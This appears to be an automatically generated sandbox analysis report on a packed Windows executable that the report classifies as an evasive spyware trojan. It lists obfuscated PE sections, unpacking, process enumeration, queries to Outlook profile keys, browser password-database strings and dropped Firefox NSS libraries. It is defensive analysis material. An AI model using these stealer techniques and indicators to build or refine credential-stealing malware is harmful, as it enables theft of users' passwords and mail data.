Source: file.exe, 00000000.00000003.2213778910.000000002FC51000.00000004.00000020.00020000.00000000.sdmp, AFBAFBKEGCFBGCBFIDAKEHDAFC.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6DB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6DB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6DB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C67F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040384C	0_2_0040384C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EB833	0_2_004EB833
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EA8EA	0_2_004EA8EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004418F4	0_2_004418F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00536123	0_2_00536123
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005309EF	0_2_005309EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053F989	0_2_0053F989
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053A9B4	0_2_0053A9B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006522E0	0_2_006522E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053C3FA	0_2_0053C3FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0048A3F4	0_2_0048A3F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F34D2	0_2_004F34D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00537D08	0_2_00537D08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DF10	0_2_0053DF10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A6F23	0_2_004A6F23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0044B72B	0_2_0044B72B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00533F23	0_2_00533F23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00477FCB	0_2_00477FCB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6735A0	0_2_6C6735A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685440	0_2_6C685440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E545C	0_2_6C6E545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E542B	0_2_6C6E542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EAC00	0_2_6C6EAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B5C10	0_2_6C6B5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2C10	0_2_6C6C2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4E0	0_2_6C67D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B6CF0	0_2_6C6B6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6864C0	0_2_6C6864C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D4D0	0_2_6C69D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D34A0	0_2_6C6D34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC4A0	0_2_6C6DC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686C80	0_2_6C686C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68FD00	0_2_6C68FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A0512	0_2_6C6A0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69ED10	0_2_6C69ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D85F0	0_2_6C6D85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B0DD0	0_2_6C6B0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6E63	0_2_6C6E6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C670	0_2_6C67C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2E4E	0_2_6C6C2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C694640	0_2_6C694640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699E50	0_2_6C699E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B3E50	0_2_6C6B3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D9E30	0_2_6C6D9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C5600	0_2_6C6C5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B7E10	0_2_6C6B7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E76E3	0_2_6C6E76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67BEF0	0_2_6C67BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68FEF0	0_2_6C68FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D4EA0	0_2_6C6D4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DE680	0_2_6C6DE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695E90	0_2_6C695E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C689F00	0_2_6C689F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B7710	0_2_6C6B7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67DFE0	0_2_6C67DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A6FF0	0_2_6C6A6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C77A0	0_2_6C6C77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BF070	0_2_6C6BF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698850	0_2_6C698850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D850	0_2_6C69D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB820	0_2_6C6BB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C4820	0_2_6C6C4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687810	0_2_6C687810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69C0E0	0_2_6C69C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B58E0	0_2_6C6B58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E50C7	0_2_6C6E50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A60A0	0_2_6C6A60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D960	0_2_6C68D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB970	0_2_6C6CB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EB170	0_2_6C6EB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69A940	0_2_6C69A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C9A0	0_2_6C67C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AD9B0	0_2_6C6AD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B5190	0_2_6C6B5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D2990	0_2_6C6D2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9A60	0_2_6C6B9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C691AF0	0_2_6C691AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE2F0	0_2_6C6BE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B8AC0	0_2_6C6B8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6722A0	0_2_6C6722A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4AA0	0_2_6C6A4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68CAB0	0_2_6C68CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E2AB0	0_2_6C6E2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EBA90	0_2_6C6EBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68C370	0_2_6C68C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675340	0_2_6C675340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BD320	0_2_6C6BD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E53C8	0_2_6C6E53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F380	0_2_6C67F380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6B94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6ACBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00184610 appears 316 times

Source: file.exe, 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2294654696.000000006C8F5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: trzlrlhz ZLIB complexity 0.9949077347285068

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6D7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001990A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_001990A0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\K5QO88QS.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2129376335.000000001D788000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144202039.000000001D77B000.00000004.00000020.00020000.00000000.sdmp, IJECBGIJDGCAEBFIIECA.0.dr, FCAAEHJDBKJJKFHJEBKF.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294211345.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 36%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1793024 > 1048576

Source: file.exe

Static PE information: Raw size of trzlrlhz is bigger than: 0x100000 < 0x19e600

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.180000.0.unpack :EW;.rsrc :W;.idata :W; :EW;trzlrlhz:EW;xbmoezwd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;trzlrlhz:EW;xbmoezwd:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00199270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00199270

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1bc2af should be: 0x1c0591

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: trzlrlhz
Source: file.exe	Static PE information: section name: xbmoezwd
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0059485D push ebx; mov dword ptr [esp], ebp	0_2_00594B0D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040384C push eax; mov dword ptr [esp], 77B68D3Dh	0_2_004038A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040384C push 099F1244h; mov dword ptr [esp], edx	0_2_00403908
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040384C push 64E96EF2h; mov dword ptr [esp], edx	0_2_00403960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040384C push 7A0719D3h; mov dword ptr [esp], edx	0_2_00403A8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040384C push 3EAF2E37h; mov dword ptr [esp], edx	0_2_00403AC4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040384C push ecx; mov dword ptr [esp], edx	0_2_00403AE6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005AD840 push ebp; mov dword ptr [esp], esi	0_2_005AD869
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005AD840 push ecx; mov dword ptr [esp], edx	0_2_005AD8B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005AD840 push edx; mov dword ptr [esp], ebp	0_2_005AD936
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0064382D push eax; mov dword ptr [esp], ebx	0_2_0064386F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0064382D push eax; mov dword ptr [esp], 20982D21h	0_2_006438C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0064382D push eax; mov dword ptr [esp], edi	0_2_00643983
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0064382D push edx; mov dword ptr [esp], ebx	0_2_0064398E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005A5801 push 064FB310h; mov dword ptr [esp], eax	0_2_005A5826
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00656807 push 4B935808h; mov dword ptr [esp], esp	0_2_0065684B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00656807 push ebp; mov dword ptr [esp], ecx	0_2_0065688E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062D00D push edi; mov dword ptr [esp], ebp	0_2_0062D0B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061C01B push ebx; mov dword ptr [esp], ecx	0_2_0061C022
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061C01B push ecx; mov dword ptr [esp], esp	0_2_0061C026
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EB833 push 57AEFA65h; mov dword ptr [esp], edx	0_2_004EB89F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EB833 push 673A5A5Ah; mov dword ptr [esp], ebp	0_2_004EB982
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EB833 push 6AE88032h; mov dword ptr [esp], eax	0_2_004EB99C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00807020 push 1606C2ACh; mov dword ptr [esp], eax	0_2_0080707E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00807020 push esi; mov dword ptr [esp], 3069AFD6h	0_2_008070F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00807020 push 6876EAD6h; mov dword ptr [esp], ecx	0_2_00807125
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF8FC push edx; mov dword ptr [esp], ecx	0_2_005CF937
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EA8EA push 7D5F6576h; mov dword ptr [esp], edi	0_2_004EA9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EA8EA push ebx; mov dword ptr [esp], 2AE76B6Ch	0_2_004EA9D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EA8EA push 09BABA4Ah; mov dword ptr [esp], eax	0_2_004EAA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EA8EA push ebx; mov dword ptr [esp], edx	0_2_004EAA8B

Source: file.exe

Static PE information: section name: trzlrlhz entropy: 7.953821840467499

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
